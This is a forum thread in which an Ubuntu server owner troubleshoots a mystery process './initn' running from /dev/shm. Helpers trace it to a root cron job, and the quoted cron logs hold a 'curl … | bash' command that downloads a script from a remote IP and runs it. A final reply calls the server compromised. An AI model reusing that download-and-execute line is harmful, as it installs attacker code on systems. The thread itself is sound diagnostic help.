Question ubuntu 18.04 server, "./initn -t 2" taking half of my cpu time

Hi,

htop command shows me always 2 lines with this process, taking up 2/4 cpu's for 100%
<pid> root 20 0 ..... ./initn -t 2

I can't find any file with that name on my system.
Killing the process just results in a restart +/- 10 seconds later.
Reboot also doesn't solve anything.
It blocks me from running glassfish for example,
glassfish shuts down without a trace when ./initn pops up again.

sudo strace -p <pid> gives an endless stream of the next line:
sched_yield() = 0

So I'm seeking help to get rid of this process.
I run Ubuntu 18.04 server, updated with the latest packages.
It has a postgresql database (which runs), glassfish (which doesn't run since this problem came up), and funtions also as a network router.

The only thing I changed on the system was changing my network configuration to set up a working LAN,
but I must say that this was a huge struggle since no documentation found on the internet seemed to work.

Any help is welcome, all my work is stalled until this is resolved.

You can easily find the executable file of this process: /proc/PID/exe is a symbolic link to it. Replace PID with the process ID.
Another clue could be the process’ parent, the PPID in the ps -ef output.

the content of

That's what you get when you dump out an executable. What would be interesting is the target of the symbolic link /proc/<pid>/exe. That is the executable file from which this process was created.

It's a direct child of the init process, which doesn't help us.

Another idea: If it was started as a service, you can map it to its service with
Code:
systemctl status <pid>
or
Code:
systemctl status
then scrolling down until you find it.

it's one of the things I did today, looking at the symbolic link.
sudo ls /proc/13005/exe -l
results in
lrwxrwxrwx 1 root root 0 Jan 13 10:07 /proc/13005/exe -> /dev/shm/initn

which is in the shared memory, but that doesn't seem to help me.
Then again, I don't know that much about it.

systemctl status 13005

ok, we got what you hoped for.
I never configured any cron jobs, no idea why it came to life all of a sudden.

Code:
● cron.service - Regular background program processing daemon
   Loaded: loaded (/lib/systemd/system/cron.service; enabled; vendor preset: enabled)
   Active: active (running) since Fri 2019-01-11 12:53:43 UTC; 2 days ago
     Docs: man:cron(8)
 Main PID: 1129 (cron)
    Tasks: 8 (limit: 3313)
   CGroup: /system.slice/cron.service
           ├─ 1129 /usr/sbin/cron -f
           └─13005 ./initn -t 2

Jan 13 14:54:01 pelgrimserver CRON[24037]: (root) CMD (curl -s http://192.227.186.154:7756/systemw.jpg | bash -s)
Jan 13 14:54:04 pelgrimserver CRON[24036]: (CRON) info (No MTA installed, discarding output)
Jan 13 14:54:04 pelgrimserver CRON[24036]: pam_unix(cron:session): session closed for user root
Jan 13 14:55:01 pelgrimserver CRON[24073]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan 13 14:55:01 pelgrimserver CRON[24074]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan 13 14:55:01 pelgrimserver CRON[24075]: (root) CMD (curl -s http://192.227.186.154:7756/systemw.jpg | bash -s)

Jan 13 14:55:05 pelgrimserver CRON[24074]: pam_unix(cron:session): session closed for user root
So, I assume you want the contents of
/lib/systemd/system/cron.service
Code:
[Unit]
Description=Regular background program processing daemon
Documentation=man:cron(8)

[Service]
EnvironmentFile=-/etc/default/cron
ExecStart=/usr/sbin/cron -f $EXTRA_OPTS
IgnoreSIGPIPE=false
KillMode=process

[Install]
WantedBy=multi-user.target
echo $EXTRA_OPTS
is empty

finally found how to stop cron
so for now I can manually fix this, my glassfish is up and running now.

but this is not a real solution,
when my server needs to reboot it will pop up again, I don't want to be forced to login and stop cron each time.
What's more, like the situation is for the moment, this will prevent me from using cron.

So, I would like to get rid of this cron task that starts this initn process.
Anyone has a clue where to look.
See previous post for my /lib/systemd/system/cron.service

Cron uses the crontab to schedule jobs. Could it be started from there?

didn't find a config file yet where that initn was configured

I'm open for suggestions.

Brute force:
Code:
grep -I -r initn /
Wont work exactly like this because of /sys and /proc.

No result. This is spooky.

I have nothing else to offer, except perhaps: Kill the process and remove /dev/shm/initn. Use auditing to find out who/what creates /dev/shm/initn. Sorry I can't give you precise instructions how to set up your auditing rules.

no problem, you helped me already a lot.

I have other priorities now, certainly since my network problems and this spooky initn took my server for 10 days out,
but I will try to look into it later.

Pretty blase about it. You have a process that replicates itself by going out to an external server, and you don't care ?.
I'd say you've been pawned - if I had to guess I'd say a bitcoin miner or such. If you're lucky.

Disconnect, clean up you system - rebuild from scratch in need. Change all your passwords - especially root enabled; ssh ?.
